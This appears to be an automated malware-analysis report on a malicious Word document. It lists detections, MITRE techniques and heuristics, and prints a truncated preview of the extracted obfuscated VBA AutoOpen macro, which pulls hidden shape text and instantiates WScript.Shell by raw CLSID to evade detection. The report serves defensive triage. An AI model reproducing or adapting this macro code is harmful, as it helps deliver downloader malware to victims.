MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the dangerous `GetObject` function with the `WScript.Shell` CLSID, indicating an intent to execute arbitrary code. The macro's structure suggests it is designed to download and execute a second-stage payload, a common technique for malware delivery.
Heuristics 8
-
ClamAV: Doc.Malware.Powload-6813874-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6813874-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7353 bytes |
SHA-256: a608e9357e368a852156da2e494f22d8e6b8ec6ccf39fca08a34dcf06b33c962 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GARczMqm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case vkrIvo
Case 261796299
JMPfnbvWX = CBool(PIMdwq)
XozAFqzj = 202977267
Case 254520823
BwZTiSn = Atn(aJpVSAf)
oDwSlB = Atn(150279987 * CLng(161171088))
End Select
For Each opEWS In IoUUarvat
WPbhSjzZf = ffUpA * CDate(BTtciGH * jjwjES) * dFcPluqhH / Sin(iqKQdUiU) / qbjQH + 108102333 - 51234510 + Chr(94127773) + (liTVM * CasZOi)
Next
On Error Resume Next
Select Case wbSfAuHqB
Case 228511584
MWQBzzj = CBool(iplArb)
EBzJRFzYj = 140090619
Case 317061610
CORXFoUc = Atn(HjQGqziK)
bbEJpG = Atn(281881762 * CLng(290387237))
End Select
For Each QMzhjD In iwQRfL
wIzRiDb = VOVuU * CDate(sZLjNXEQ * ZDNvMAOs) * PFFBsoIo / Sin(IrjLlidl) / EkSnRhX + 152978737 - 94832442 + Chr(135138031) + (PHGVn * PcqjWYY)
Next
Set mnDPzzDM = Shapes("CwhpKNbbRl")
On Error Resume Next
Select Case BXfUnH
Case 57851
RzRMWR = CBool(ZJPFj)
tTPSvJ = 198933616
Case 105961790
VBHWTPR = Atn(KzNSa)
UJVBwsLR = Atn(85127322 * CLng(240300735))
End Select
For Each IDPCrwVCw In PFAzrHz
HVBSk = IaHhXJEpW * CDate(LMCHSzr * iGFEUD) * kLNFO / Sin(pSUtRqoin) / aiVmfFr + 246706414 - 53337129 + Chr(201585195) + (odpEFEcn * rjIpVtiOB)
Next
On Error Resume Next
Select Case kCjBkNGiv
Case 179842107
KQzTP = CBool(WINstzHPE)
UXMzjLK = 106854421
Case 50139025
voBBioWD = Atn(HcQiaTF)
BrFcm = Atn(208979615 * CLng(235211728))
End Select
For Each LjbWwGhM In whGLJFaD
zBDolfaH = ZCEJJ * CDate(QXFuhd * vEAcm) * srlfYwiih / Sin(wvvqzIK) / oYovmzf + 150600169 - 62911840 + Chr(313256652) + (zoItb * QnWjKa)
Next
wKlRJ = "" + bzjFBo + rifVzRZ + LmLrpjqa + mWdkzb + mnDPzzDM.TextFrame.TextRange.Text + YjUEDZp + vJiGmDId + uBBpuTAn
On Error Resume Next
Select Case Mzupinujk
Case 58059155
XJHHcGwhs = CBool(YWNnXzi)
vvSVp = 327101863
Case 331789580
PXXUt = Atn(EqNtLoc)
KjBXnajCG = Atn(262793553 * CLng(106085712))
End Select
For Each pMcBUJI In qZJYbBS
Ziophvl = URJXWMQj * CDate(UhrNL * BfCIkZc) * mIIcczart / Sin(sjCAlDd) / aUHUa + 64122061 - 90789514 + Chr(29569258) + (KimAKrVX * Njnjdc)
Next
On Error Resume Next
Select Case FoowV
Case 157925559
JAARS = CBool(tiZtQn)
jWkiKG = 12526672
Case 298256573
IjwQi = Atn(LwbTr)
GKiCRJp = Atn(196775958 * CLng(107896437))
End Select
For Each UEFXiEFlO In HErQVBi
WbRwvnaM = jtwMP * CDate(RPrLLbHs * EVWCSShPf) * HoZXJ / Sin(wVBYsS) / rPaAd + 282037331 - 128943292 + Chr(50025956) + (ibsZRY * kzdRGIzrr)
Next
On Error Resume Next
Select Case OUPWOQjo
Case 251591343
pYXKlFHSK = CBool(XKjqbzhz)
WFAWp = 175999019
Case 164045125
UcOzV = Atn(ssMtU)
UDRWUJE = Atn(266638292 * CLng(161282208))
End Select
For Each OihmPkoCh In MznpvlBH
zOFNdhSo = CjWkiZN * CDate(SjnIEKMk * WQbaj) * zAajJ / Sin(EEwwJz) / NcPNc + 105572309 - 123600096 + Chr(121896687) + (ftDtdT * BMDSYY)
Next
On Error Resume Next
Select Case NsCjvOaRo
Case 131495540
lwcodjh = CBool(zkbFMAAB)
jikwnwVN = 201509120
Case 288855890
djCjkaCjr = Atn(PwZwF)
lmqivN = Atn(284979970 * CLng(226420251))
End Select
For Each jfzAG In zroLShr
lwUKZUk = Bihkao * CDate(zQpTd * uFfki) * Gklmju / Sin(EkaCRO) / YiOSWAK + 229956099 - 282008199 + Chr(306754750) + (ONTrsoa * EdaPwBpIk)
Next
Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B8
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.